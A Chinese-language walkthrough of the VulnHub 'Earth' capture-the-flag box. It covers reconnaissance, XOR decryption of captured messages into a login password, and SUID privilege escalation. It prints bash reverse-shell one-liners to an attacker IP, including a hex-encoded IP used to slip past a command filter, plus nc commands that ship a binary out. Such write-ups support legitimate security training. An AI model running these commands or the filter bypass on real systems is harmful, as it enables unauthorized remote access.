目录

前言

一、信息收集

0x00 arp-scan扫描

0x01 nmap扫描

二、目录扫描

0x00 dirb扫描

0x01 XOR解密

三、漏洞利用

0x00 命令执行漏洞

0x01 反弹shell绕过

四、权限提升

0x00 strace安装

0x01 文件利用

flag



前言

Difficulty: Easy

Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash.

难度:简单
地球是一个简单的盒子,尽管您可能会发现它比本系列中的“水星”更具挑战性,并且根据您的经验,在简单的更难的一面。盒子上有两个标志:一个用户标志和一个包含 md5 哈希的根标志。

下载链接:

https://download.vulnhub.com/theplanets/Earth.ova.torrent


一、信息收集

0x00 arp-scan扫描

arp-san -I eth1 -l  #指定网卡扫描 

0x01 nmap扫描

nmap -A 192.168.56.101
发现有earth.local、terratest.earth.local两个DNS解析。

修改hosts文件确保能够正常访问

Windows位置:C:\Windows\System32\drivers\etc\hosts

linux位置:         /etc/hosts

windows:

kali:

http://earth.local
http://terratest.earth.local
两个页面一致
有三行数值
Previous Messages:
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

https://terratest.earth.local页面不一致

二、目录扫描

0x00 dirb扫描

earth.local扫描结果一样
terratest.earth.local多一个robots.txt

/testingnotes.*是文件,上边都是后缀,逐个尝试发现/testingnotes.txt

测试安全消息系统注意事项:
*使用 XOR 加密作为算法,在 RSA 中使用应该是安全的。
*地球已确认他们已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将我们的每月密钥发送到地球?还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。钥匙应该多长?
*需要改进消息界面和管理面板的界面,目前非常基础。
​
获取三个信息
1、XOR加密算法
2、testdata.txt文件
3、terra为用户名

testdata.txt文件内容

根据辐射测年估计和其他证据,地球形成于 45 亿年前。在地球历史的最初十亿年中,生命出现在海洋中并开始影响地球的大气和地表,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在 41 亿年前就已经出现。

0x01 XOR解密

# -*- coding:utf-8 -*-
import binascii
​
str1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
​
testdata = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
​
#先将testdata文本编码,然后再将字符串转换成十六进制,为什么呢,因为XOR异或运算是十六进制运算符
​
testdata = binascii.b2a_hex(testdata.encode("utf-8"))
​
# int(str1, 16)指明str1是十六进制整数值,hex()
#将括号里的十进制数值转化为十六进制(XOR运算之后的数值是十进制·········)。
​
result = hex(int(str1, 16) ^ int(testdata, 16))
​
print(result)

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
去掉0x转化为字符串
转换地址:https://www.toolscat.com/decode/hex

用户名:            terra

密码:     earthclimatechangebad4humans

目录扫描有登录框,直接登录。

三、漏洞利用

0x00 命令执行漏洞

0x01 反弹shell绕过

可以考虑写反弹shell

bash -i >& /dev/tcp/192.168.56.101/9001 0>&1
bash -i >& /dev/tcp/MTkyLjE2OC41Ni4xMDEvOTAwMQ== 0>&1
#没有反应,查看攻略是被过滤掉了,用十六进制

bash -i >& /dev/tcp/0xc0.0xa8.0x38.0x66/9001 0>&1
#反弹成功

sudo -l #发现没有权限

四、权限提升

寻找可执行权限最高的文件,root比较可疑,运行一下试试看

find / -perm -u=s -type f 2>/dev/null
find / -perm /u=s -type f 2>/dev/null
-perm 按权限查找 ugo(用户/组/其他) rwx(读/写/执行)
S 为SUID/SGID特殊权限
-type 文件类型f->文件  d->文件夹
2>/dev/null 不显示错误信息 2->错误输出(0->标准输入; 1->标准输出) >(先清除再写入) or >>(追加) /dev/null位桶(黑洞),接受到的任何数据都会被丢弃

0x00 strace安装

apt-get install atrace
sudo apt-get instasll strace  权限不够用sudo

0x01 文件利用

靶机:nc 192.168.56.102 7777 </usr/bin/reset_root

kali监听:nc -lvvp 7777>reset_root

已接收到reset_root

在shell靶机上创建三个文件

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe

然后运行,拿到root密码

切换用户,获得root权限


flag

【Vulnhub靶场】Earth相关推荐

  1. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  2. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  5. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  6. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  7. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  8. vulnhub靶场,FirstBlood

    vulnhub靶场,FirstBlood 环境准备 靶机下载地址:https://www.vulnhub.com/entry/firstblood-1,564/ 攻击机:kali(192.168.10 ...

  9. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

  10. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

最新文章

  1. 罗兰贝格84页白皮书:一文看懂中国ICT产业新黄金十年
  2. webbench网络压力测试源码
  3. 什么样 信号_深圳停止商务公寓用地审批释放着什么样的信号,会引起房价下跌吗...
  4. 数据归一化的作用--在svm 训练的时候特别有用
  5. 数据:以太坊上借贷协议资金规模年内增长幅度超300%
  6. SAP License:一位在ERP行业从业九年的经验总结
  7. iOS tableView刷新
  8. mysql 截取 效率,MySQL 随机函数获取数据速度和效率分析
  9. 【Java】Java与数字证书
  10. 主成分与因子分析异同_主成分和因子分析原理及比较
  11. android发送语音动画,Android仿微信发送语音消息的功能及示例代码
  12. uniapp选择图片压缩并上传
  13. 403forbiden解决
  14. form表单标签的简单使用
  15. 计算机病毒的入侵路径,计算机病毒的入侵方式有哪些?
  16. 国信证券学习系列(2)
  17. webpack工具链热替换 -- angularjs的粗放式实现
  18. 曲线快捷键,色阶快捷键,曝光度,自然饱和度,色相饱和度,色彩平衡
  19. 电磁场与仿真软件(16)
  20. 团队沟通效率低的 5 个原因和高效的团队合作技巧

热门文章

  1. 使用html和js制作饼图,使用js画图之饼图
  2. 服务器开虚拟机总是gpu满载,vSphere 环境机器学习 GPU 加速方案选型
  3. 【模型压缩】蒸馏神经网络(Distill the Knowledge in a Neural Network)
  4. Python学习记录 基于《Python编程 从入门到实践》 Python基础 Python第三课 操作列表
  5. 批处理——读写文件、字符串替换
  6. 思维层次越高的人越爱看这几个公众号!
  7. php不显示notice,解决PHP显示Warning和Notice等问题
  8. oracle-ORA的原理
  9. 倒计时1天,六位专家周末带你解锁前端研发新姿势
  10. 乐高机器人走进图书馆活动方案_乐高机器人制作~~乐高大派对